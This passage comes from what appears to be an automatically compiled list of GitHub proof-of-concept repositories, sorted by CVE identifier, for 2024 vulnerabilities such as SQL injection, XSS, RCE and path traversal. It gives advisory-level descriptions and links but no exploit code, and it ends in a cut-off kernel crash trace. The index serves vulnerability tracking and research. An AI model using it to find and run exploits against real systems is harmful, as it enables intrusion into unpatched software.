- [AungSoePaing/CVE-2024-39069](https://github.com/AungSoePaing/CVE-2024-39069)
### CVE-2024-39081
- [Amirasaiyad/BLE-TPMS](https://github.com/Amirasaiyad/BLE-TPMS)
### CVE-2024-39203 (2024-07-08)
A cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
- [5r1an/CVE-2024-39203](https://github.com/5r1an/CVE-2024-39203)
### CVE-2024-39205
- [Marven11/CVE-2024-39205-Pyload-RCE](https://github.com/Marven11/CVE-2024-39205-Pyload-RCE)
### CVE-2024-39210 (2024-07-05)
Best House Rental Management System v1.0 was discovered to contain an arbitrary file read vulnerability via the Page parameter at index.php. This vulnerability allows attackers to read arbitrary PHP files and access other sensitive information within the application.
- [KRookieSec/CVE-2024-39210](https://github.com/KRookieSec/CVE-2024-39210)
### CVE-2024-39211 (2024-07-04)
Kaiten 57.128.8 allows remote attackers to enumerate user accounts via a crafted POST request, because a login response contains a user_email field only if the user account exists.
- [artemy-ccrsky/CVE-2024-39211](https://github.com/artemy-ccrsky/CVE-2024-39211)
### CVE-2024-39248 (2024-07-03)
A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field at /admin.php.
- [jasonthename/CVE-2024-39248](https://github.com/jasonthename/CVE-2024-39248)
### CVE-2024-39250 (2024-07-22)
EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
- [efrann/CVE-2024-39250](https://github.com/efrann/CVE-2024-39250)
### CVE-2024-39304 (2024-07-26)
ChurchCRM is an open-source church management system. Versions of the application prior to 5.9.2 are vulnerable to an authenticated SQL injection due to an improper sanitization of user input. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements directly into the database query due to inadequate sanitization of the EID parameter in in a GET request to `/GetText.php`. Version 5.9.2 patches the issue.
- [apena-ba/CVE-2024-39304](https://github.com/apena-ba/CVE-2024-39304)
### CVE-2024-39306
- [apena-ba/CVE-2024-39306](https://github.com/apena-ba/CVE-2024-39306)
### CVE-2024-39614 (2024-07-10)
An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings containing specific characters.
- [Abdurahmon3236/-CVE-2024-39614](https://github.com/Abdurahmon3236/-CVE-2024-39614)
### CVE-2024-39689 (2024-07-05)
Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.05.30 and prior to 2024.07.4 recognized root certificates from `GLOBALTRUST`. Certifi 2024.07.04 removes root certificates from `GLOBALTRUST` from the root store. These are in the process of being removed from Mozilla's trust store. `GLOBALTRUST`'s root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues."
- [roy-aladin/InfraTest](https://github.com/roy-aladin/InfraTest)
### CVE-2024-39700 (2024-07-16)
JupyterLab extension template is a `copier` template for JupyterLab extensions. Repositories created using this template with `test` option include `update-integration-tests.yml` workflow which has an RCE vulnerability. Extension authors hosting their code on GitHub are urged to upgrade the template to the latest version. Users who made changes to `update-integration-tests.yml`, accept overwriting of this file and re-apply your changes later. Users may wish to temporarily disable GitHub Actions while working on the upgrade. We recommend rebasing all open pull requests from untrusted users as actions may run using the version from the `main` branch at the time when the pull request was created. Users who are upgrading from template version prior to 4.3.0 may wish to leave out proposed changes to the release workflow for now as it requires additional configuration.
- [LOURC0D3/CVE-2024-39700-PoC](https://github.com/LOURC0D3/CVE-2024-39700-PoC)
### CVE-2024-39844 (2024-07-03)
In ZNC before 1.9.1, remote code execution can occur in modtcl via a KICK.
- [ph1ns/CVE-2024-39844](https://github.com/ph1ns/CVE-2024-39844)
### CVE-2024-39929 (2024-07-04)
Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users.
- [rxerium/CVE-2024-39929](https://github.com/rxerium/CVE-2024-39929)
- [michael-david-fry/CVE-2024-39929](https://github.com/michael-david-fry/CVE-2024-39929)
### CVE-2024-39943 (2024-07-04)
rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
- [truonghuuphuc/CVE-2024-39943-Poc](https://github.com/truonghuuphuc/CVE-2024-39943-Poc)
### CVE-2024-40080
- [perras/CVE-2024-40080](https://github.com/perras/CVE-2024-40080)
### CVE-2024-40110 (2024-07-12)
Sourcecodester Poultry Farm Management System v1.0 contains an Unauthenticated Remote Code Execution (RCE) vulnerability via the productimage parameter at /farm/product.php.
- [Abdurahmon3236/CVE-2024-40110](https://github.com/Abdurahmon3236/CVE-2024-40110)
### CVE-2024-40119 (2024-07-17)
Nepstech Wifi Router xpon (terminal) model NTPL-Xpon1GFEVN v.1.0 Firmware V2.0.1 contains a Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.
- [sudo-subho/nepstech-xpon-router-CVE-2024-40119](https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119)
### CVE-2024-40318 (2024-07-25)
An arbitrary file upload vulnerability in Webkul Qloapps v1.6.0.0 allows attackers to execute arbitrary code via uploading a crafted file.
- [3v1lC0d3/RCE-QloApps-CVE-2024-40318](https://github.com/3v1lC0d3/RCE-QloApps-CVE-2024-40318)
### CVE-2024-40324 (2024-07-25)
A CRLF injection vulnerability in E-Staff v5.1 allows attackers to insert Carriage Return (CR) and Line Feed (LF) characters into input fields, leading to HTTP response splitting and header manipulation.
- [aleksey-vi/CVE-2024-40324](https://github.com/aleksey-vi/CVE-2024-40324)
### CVE-2024-40348 (2024-07-20)
An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.
- [bigb0x/CVE-2024-40348](https://github.com/bigb0x/CVE-2024-40348)
### CVE-2024-40422 (2024-07-24)
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
- [alpernae/CVE-2024-40422](https://github.com/alpernae/CVE-2024-40422)
- [j3r1ch0123/CVE-2024-40422](https://github.com/j3r1ch0123/CVE-2024-40422)
### CVE-2024-40431
- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN)
### CVE-2024-40457 (2024-09-12)
No-IP Dynamic Update Client (DUC) v3.x uses cleartext credentials that may occur on a command line or in a file. NOTE: the vendor's position is that cleartext in /etc/default/noip-duc is recommended and is the intentional behavior.
- [jeppojeps/CVE-2024-40457-PoC](https://github.com/jeppojeps/CVE-2024-40457-PoC)
### CVE-2024-40492 (2024-07-17)
Cross Site Scripting vulnerability in Heartbeat Chat v.15.2.1 allows a remote attacker to execute arbitrary code via the setname function.
- [minendie/POC_CVE-2024-40492](https://github.com/minendie/POC_CVE-2024-40492)
### CVE-2024-40498 (2024-08-05)
SQL Injection vulnerability in PuneethReddyHC Online Shopping sysstem advanced v.1.0 allows an attacker to execute arbitrary code via the register.php
- [Dirac231/CVE-2024-40498](https://github.com/Dirac231/CVE-2024-40498)
### CVE-2024-40500 (2024-08-12)
Cross Site Scripting vulnerability in Martin Kucej i-librarian v.5.11.0 and before allows a local attacker to execute arbitrary code via the search function in the import component.
- [nitipoom-jar/CVE-2024-40500](https://github.com/nitipoom-jar/CVE-2024-40500)
### CVE-2024-40506
- [Jansen-C-Moreira/CVE-2024-40506](https://github.com/Jansen-C-Moreira/CVE-2024-40506)
### CVE-2024-40507
- [Jansen-C-Moreira/CVE-2024-40507](https://github.com/Jansen-C-Moreira/CVE-2024-40507)
### CVE-2024-40508
- [Jansen-C-Moreira/CVE-2024-40508](https://github.com/Jansen-C-Moreira/CVE-2024-40508)
### CVE-2024-40509
- [Jansen-C-Moreira/CVE-2024-40509](https://github.com/Jansen-C-Moreira/CVE-2024-40509)
### CVE-2024-40510
- [Jansen-C-Moreira/CVE-2024-40510](https://github.com/Jansen-C-Moreira/CVE-2024-40510)
### CVE-2024-40511
- [Jansen-C-Moreira/CVE-2024-40511](https://github.com/Jansen-C-Moreira/CVE-2024-40511)
### CVE-2024-40512
- [Jansen-C-Moreira/CVE-2024-40512](https://github.com/Jansen-C-Moreira/CVE-2024-40512)
### CVE-2024-40617 (2024-07-17)
Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked.
- [KyssK00L/CVE-2024-40617](https://github.com/KyssK00L/CVE-2024-40617)
### CVE-2024-40658 (2024-09-11)
In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658)
### CVE-2024-40662 (2024-09-11)
In scheme of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [Aakashmom/net_G2.5_CVE-2024-40662](https://github.com/Aakashmom/net_G2.5_CVE-2024-40662)
### CVE-2024-40673
- [Aakashmom/G3_libcore_native_CVE-2024-40673](https://github.com/Aakashmom/G3_libcore_native_CVE-2024-40673)
### CVE-2024-40675
- [Aakashmom/intent_CVE-2024-40675](https://github.com/Aakashmom/intent_CVE-2024-40675)
### CVE-2024-40676
- [Aakashmom/frameworks_base_accounts_CVE-2024-40676](https://github.com/Aakashmom/frameworks_base_accounts_CVE-2024-40676)
- [Aakashmom/accounts_CVE-2024-40676-](https://github.com/Aakashmom/accounts_CVE-2024-40676-)
### CVE-2024-40711 (2024-09-07)
A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).
- [watchtowrlabs/CVE-2024-40711](https://github.com/watchtowrlabs/CVE-2024-40711)
- [realstatus/CVE-2024-40711-Exp](https://github.com/realstatus/CVE-2024-40711-Exp)
### CVE-2024-40725 (2024-07-18)
A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.\n\nUsers are recommended to upgrade to version 2.4.62, which fixes this issue.\n\n
- [TAM-K592/CVE-2024-40725-CVE-2024-40898](https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898)
### CVE-2024-40892 (2024-08-12)
A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely).
- [xen0bit/fwbt](https://github.com/xen0bit/fwbt)
### CVE-2024-41107 (2024-07-19)
The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.\n\nAffected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.\n\n
- [d0rb/CVE-2024-41107](https://github.com/d0rb/CVE-2024-41107)
### CVE-2024-41110 (2024-07-24)
Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.\n\nUsing a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.\n\nA security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.\n\nDocker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.\n\ndocker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.
- [vvpoglazov/cve-2024-41110-checker](https://github.com/vvpoglazov/cve-2024-41110-checker)
- [PauloParoPP/CVE-2024-41110-SCAN](https://github.com/PauloParoPP/CVE-2024-41110-SCAN)
### CVE-2024-41276
- [artemy-ccrsky/CVE-2024-41276](https://github.com/artemy-ccrsky/CVE-2024-41276)
### CVE-2024-41290
- [paragbagul111/CVE-2024-41290](https://github.com/paragbagul111/CVE-2024-41290)
### CVE-2024-41301
- [patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting](https://github.com/patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting)
### CVE-2024-41302
- [patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection](https://github.com/patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection)
### CVE-2024-41312
- [Amal264882/CVE-2024-41312.](https://github.com/Amal264882/CVE-2024-41312.)
### CVE-2024-41570 (2024-08-09)
An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server.
- [chebuya/Havoc-C2-SSRF-poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)
### CVE-2024-41628 (2024-07-26)
Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API.
- [Redshift-CyberSecurity/CVE-2024-41628](https://github.com/Redshift-CyberSecurity/CVE-2024-41628)
### CVE-2024-41640 (2024-07-29)
Cross Site Scripting (XSS) vulnerability in AML Surety Eco up to 3.5 allows an attacker to run arbitrary code via crafted GET request using the id parameter.
- [alemusix/CVE-2024-41640](https://github.com/alemusix/CVE-2024-41640)
### CVE-2024-41651 (2024-08-12)
An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality.
- [Fckroun/CVE-2024-41651](https://github.com/Fckroun/CVE-2024-41651)
### CVE-2024-41662 (2024-07-24)
VNote is a note-taking platform. A Cross-Site Scripting (XSS) vulnerability has been identified in the Markdown rendering functionality of versions 3.18.1 and prior of the VNote note-taking application. This vulnerability allows the injection and execution of arbitrary JavaScript code through which remote code execution can be achieved. A patch for this issue is available at commit f1af78573a0ef51d6ef6a0bc4080cddc8f30a545. Other mitigation strategies include implementing rigorous input sanitization for all Markdown content and utilizing a secure Markdown parser that appropriately escapes or strips potentially dangerous content.
- [sh3bu/CVE-2024-41662](https://github.com/sh3bu/CVE-2024-41662)
### CVE-2024-41958 (2024-08-05)
mailcow: dockerized is an open source groupware/email suite based on docker. A vulnerability has been discovered in the two-factor authentication (2FA) mechanism. This flaw allows an authenticated attacker to bypass the 2FA protection, enabling unauthorized access to other accounts that are otherwise secured with 2FA. To exploit this vulnerability, the attacker must first have access to an account within the system and possess the credentials of the target account that has 2FA enabled. By leveraging these credentials, the attacker can circumvent the 2FA process and gain access to the protected account. This issue has been addressed in the `2024-07` release. All users are advised to upgrade. There are no known workarounds for this vulnerability.
- [OrangeJuiceHU/CVE-2024-41958-PoC](https://github.com/OrangeJuiceHU/CVE-2024-41958-PoC)
### CVE-2024-41992
- [fj016/CVE-2024-41992-PoC](https://github.com/fj016/CVE-2024-41992-PoC)
### CVE-2024-42461 (2024-08-02)
In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.
- [fevar54/CVE-2024-42461](https://github.com/fevar54/CVE-2024-42461)
### CVE-2024-42640
- [rvizx/CVE-2024-42640](https://github.com/rvizx/CVE-2024-42640)
### CVE-2024-42642 (2024-09-04)
Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller.
- [VL4DR/CVE-2024-42642](https://github.com/VL4DR/CVE-2024-42642)
### CVE-2024-42657 (2024-08-19)
An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during login process
- [sudo-subho/CVE-2024-42657](https://github.com/sudo-subho/CVE-2024-42657)
### CVE-2024-42658 (2024-08-19)
An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookie's parameter
- [sudo-subho/CVE-2024-42658](https://github.com/sudo-subho/CVE-2024-42658)
### CVE-2024-42758 (2024-08-16)
A Cross-site Scripting (XSS) vulnerability exists in version v2024-01-05 of the indexmenu plugin when is used and enabled in Dokuwiki (Open Source Wiki Engine). A malicious attacker can input XSS payloads for example when creating or editing existing page, to trigger the XSS on Dokuwiki, which is then stored in .txt file (due to nature of how Dokuwiki is designed), which presents stored XSS.
- [1s1ldur/CVE-2024-42758](https://github.com/1s1ldur/CVE-2024-42758)
### CVE-2024-42834
- [CyberSec-Supra/CVE-2024-42834](https://github.com/CyberSec-Supra/CVE-2024-42834)
### CVE-2024-42845 (2024-08-23)
An eval Injection vulnerability in the component invesalius/reader/dicom.py of InVesalius 3.1.99991 through 3.1.99998 allows attackers to execute arbitrary code via loading a crafted DICOM file.
- [partywavesec/invesalius3_vulnerabilities](https://github.com/partywavesec/invesalius3_vulnerabilities)
### CVE-2024-42849 (2024-08-16)
An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function.
- [njmbb8/CVE-2024-42849](https://github.com/njmbb8/CVE-2024-42849)
### CVE-2024-42850 (2024-08-16)
An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.
- [njmbb8/CVE-2024-42850](https://github.com/njmbb8/CVE-2024-42850)
### CVE-2024-42861
- [qiupy123/CVE-2024-42861](https://github.com/qiupy123/CVE-2024-42861)
### CVE-2024-42919 (2024-08-20)
eScan Management Console 14.0.1400.2281 is vulnerable to Incorrect Access Control via acteScanAVReport.
- [jeyabalaji711/CVE-2024-42919](https://github.com/jeyabalaji711/CVE-2024-42919)
### CVE-2024-42992
- [thanhh23/CVE-2024-42992](https://github.com/thanhh23/CVE-2024-42992)
### CVE-2024-43035
- [ZeroPathAI/Fonoster-LFI-PoC](https://github.com/ZeroPathAI/Fonoster-LFI-PoC)
### CVE-2024-43044 (2024-08-07)
Jenkins 2.470 and earlier, LTS 2.452.3 and earlier allows agent processes to read arbitrary files from the Jenkins controller file system by using the `ClassLoaderProxy#fetchJar` method in the Remoting library.
- [HwMex0/CVE-2024-43044](https://github.com/HwMex0/CVE-2024-43044)
- [jenkinsci-cert/SECURITY-3430](https://github.com/jenkinsci-cert/SECURITY-3430)
- [v9d0g/CVE-2024-43044-POC](https://github.com/v9d0g/CVE-2024-43044-POC)
- [convisolabs/CVE-2024-43044-jenkins](https://github.com/convisolabs/CVE-2024-43044-jenkins)
### CVE-2024-43160 (2024-08-13)
Unrestricted Upload of File with Dangerous Type vulnerability in BerqWP allows Code Injection.This issue affects BerqWP: from n/a through 1.7.6.
- [KTN1990/CVE-2024-43160](https://github.com/KTN1990/CVE-2024-43160)
### CVE-2024-43363
- [p33d/CVE-2024-43363](https://github.com/p33d/CVE-2024-43363)
### CVE-2024-43425
- [RedTeamPentesting/moodle-rce-calculatedquestions](https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions)
### CVE-2024-43532
- [HazeLook/CVE-2024-43532](https://github.com/HazeLook/CVE-2024-43532)
- [Jaden1419/CVE-2024-43532](https://github.com/Jaden1419/CVE-2024-43532)
- [ShawtyTwo/CVE-2024-43532](https://github.com/ShawtyTwo/CVE-2024-43532)
### CVE-2024-43582
- [jinxongwi/CVE-2024-43582-RCE](https://github.com/jinxongwi/CVE-2024-43582-RCE)
### CVE-2024-43917 (2024-08-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TemplateInvaders TI WooCommerce Wishlist allows SQL Injection.This issue affects TI WooCommerce Wishlist: from n/a through 2.8.2.
- [p33d/CVE-2024-43917](https://github.com/p33d/CVE-2024-43917)
### CVE-2024-43918 (2024-08-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW WBW Product Table PRO allows SQL Injection.This issue affects WBW Product Table PRO: from n/a through 1.9.4.
- [KTN1990/CVE-2024-43918](https://github.com/KTN1990/CVE-2024-43918)
### CVE-2024-43965 (2024-08-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n/a through 1.4.
- [RandomRobbieBF/CVE-2024-43965](https://github.com/RandomRobbieBF/CVE-2024-43965)
### CVE-2024-43998
- [RandomRobbieBF/CVE-2024-43998](https://github.com/RandomRobbieBF/CVE-2024-43998)
### CVE-2024-44000
- [absholi7ly/CVE-2024-44000-LiteSpeed-Cache](https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache)
- [gbrsh/CVE-2024-44000](https://github.com/gbrsh/CVE-2024-44000)
- [ifqygazhar/CVE-2024-44000-LiteSpeed-Cache](https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache)
- [geniuszlyy/CVE-2024-44000](https://github.com/geniuszlyy/CVE-2024-44000)
- [zgimszhd61/CVE-2024-44000](https://github.com/zgimszhd61/CVE-2024-44000)
### CVE-2024-44083 (2024-08-19)
ida64.dll in Hex-Rays IDA Pro through 8.4 crashes when there is a section that has many jumps linked, and the final jump corresponds to the payload from where the actual entry point will be invoked. NOTE: in many use cases, this is an inconvenience but not a security issue.
- [Azvanzed/CVE-2024-44083](https://github.com/Azvanzed/CVE-2024-44083)
### CVE-2024-44193
- [mbog14/CVE-2024-44193](https://github.com/mbog14/CVE-2024-44193)
### CVE-2024-44337
- [Brinmon/CVE-2024-44337](https://github.com/Brinmon/CVE-2024-44337)
### CVE-2024-44346
- [Shauryae1337/CVE-2024-44346](https://github.com/Shauryae1337/CVE-2024-44346)
- [sahil3276/CVE-2024-44346](https://github.com/sahil3276/CVE-2024-44346)
### CVE-2024-44349
- [AndreaF17/PoC-CVE-2024-44349](https://github.com/AndreaF17/PoC-CVE-2024-44349)
### CVE-2024-44450
- [VoidSecOrg/CVE-2024-44450](https://github.com/VoidSecOrg/CVE-2024-44450)
### CVE-2024-44541 (2024-09-11)
evilnapsis Inventio Lite Versions v4 and before is vulnerable to SQL Injection via the "username" parameter in "/?action=processlogin."
- [pointedsec/CVE-2024-44541](https://github.com/pointedsec/CVE-2024-44541)
### CVE-2024-44542
- [alphandbelt/CVE-2024-44542](https://github.com/alphandbelt/CVE-2024-44542)
### CVE-2024-44610
- [BertoldVdb/PcanExploit](https://github.com/BertoldVdb/PcanExploit)
### CVE-2024-44623 (2024-09-16)
An issue in TuomoKu SPx-GC v.1.3.0 and before allows a remote attacker to execute arbitrary code via the child_process.js function.
- [merbinr/CVE-2024-44623](https://github.com/merbinr/CVE-2024-44623)
### CVE-2024-44812
- [b1u3st0rm/CVE-2024-44812-PoC](https://github.com/b1u3st0rm/CVE-2024-44812-PoC)
### CVE-2024-44815 (2024-09-10)
Vulnerability in Hathway Skyworth Router CM5100 v.4.1.1.24 allows a physically proximate attacker to obtain user credentials via SPI flash Firmware W25Q64JV.
- [nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-](https://github.com/nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-)
### CVE-2024-44849 (2024-09-09)
Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.
- [extencil/CVE-2024-44849](https://github.com/extencil/CVE-2024-44849)
### CVE-2024-44867 (2024-09-10)
phpok v3.0 was discovered to contain an arbitrary file read vulnerability via the component /autoload/file.php.
- [ChengZyin/CVE-2024-44867](https://github.com/ChengZyin/CVE-2024-44867)
### CVE-2024-44902 (2024-09-09)
A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.
- [fru1ts/CVE-2024-44902](https://github.com/fru1ts/CVE-2024-44902)
### CVE-2024-44946 (2024-08-31)
In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Serialise kcm_sendmsg() for the same socket.\n\nsyzkaller reported UAF in kcm_release(). [0]\n\nThe scenario is\n\n 1. Thread A builds a skb with MSG_MORE and sets kcm->seq_skb.\n\n 2. Thread A resumes building skb from kcm->seq_skb but is blocked\n by sk_stream_wait_memory()\n\n 3. Thread B calls sendmsg() concurrently, finishes building kcm->seq_skb\n and puts the skb to the write queue\n\n 4. Thread A faces an error and finally frees skb that is already in the\n write queue\n\n 5. kcm_release() does double-free the skb in the write queue\n\nWhen a thread is building a MSG_MORE skb, another thread must not touch it.\n\nLet's add a per-sk mutex and serialise kcm_sendmsg().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __skb_unlink include/linux/skbuff.h:2366 [inline]\nBUG: KASAN: slab-use-after-free in __skb_dequeue include/linux/skbuff.h:2385 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge include/linux/skbuff.h:3181 [inline]\nBUG: KASAN: slab-use-after-free in kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\nRead of size 8 at addr ffff0000ced0fc80 by task syz-executor329/6167\n\nCPU: 1 PID: 6167 Comm: syz-executor329 Tainted: G B 6.8.0-rc5-syzkaller-g9abbc24128bc #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nCall trace:\n dump_backtrace+0x1b8/0x1e4 arch/arm64/kernel/stacktrace.c:291\n show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:298\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd0/0x124 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x178/0x518 mm/kasan/report.c:488\n kasan_report+0xd8/0x138 mm/kasan/report.c:601\n __asan_report_load8_noabort+0x20/0x2c mm/kasan/report_generic.c:381\n __skb_unlink include/linux/skbuff.h:2366 [inline]\n __skb_dequeue include/linux/skbuff.h:2385 [inline]\n __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\n __skb_queue_purge include/linux/skbuff.h:3181 [inline]\n kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\n __sock_release net/socket.c:659 [inline]\n sock_close+0xa4/0x1e8 net/socket.c:1421\n __fput+0x30c/0x738 fs/file_table.c:376\n ____fput+0x20/0x30 fs/file_table.c:404\n task_work_run+0x230/0x2e0 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0x618/0x1f64 kernel/exit.c:871\n do_group_exit+0x194/0x22c kernel/exit.c:1020\n get_signal+0x1500/0x15ec kernel/signal.c:2893\n do_signal+0x23c/0x3b44 arch/arm64/kernel/signal.c:1249\n do_notify_resume+0x74/0x1f4 arch/arm64/kernel/entry-common.c:148\n exit_to_user_mode_prepare arch/arm64/kernel/entry-common.c:169 [inline]\n exit_to_user_mode arch/arm64/kernel/entry-common.c:178 [inline]\n el0_svc+0xac/0x168 arch/arm64/kernel/entry-common.c:713\n el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:730\n el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598\n\nAllocated by task 6166:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x40/0x78 mm/kasan/common.c:68\n kasan_save_alloc_info+0x70/0x84 mm/kasan/generic.c:626\n unpoison_slab_object mm/kasan/common.c:314 [inline]\n __kasan_slab_alloc+0x74/0x8c mm/kasan/common.c:340\n kasan_slab_alloc include/linux/kasan.h:201 [inline]\n slab_post_alloc_hook mm/slub.c:3813 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n kmem_cache_alloc_node+0x204/0x4c0 mm/slub.c:3903\n __alloc_skb+0x19c/0x3d8 net/core/skbuff.c:641\n alloc_skb include/linux/skbuff.h:1296 [inline]\n kcm_sendmsg+0x1d3c/0x2124 net/kcm/kcmsock.c:783\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n sock_sendmsg+0x220/0x2c0 net/socket.c:768\n splice_to_socket+0x7cc/0xd58 fs/splice.c:889\n do_splice_from fs/splice.c:941 [inline]\n direct_splice_actor+0xec/0x1d8 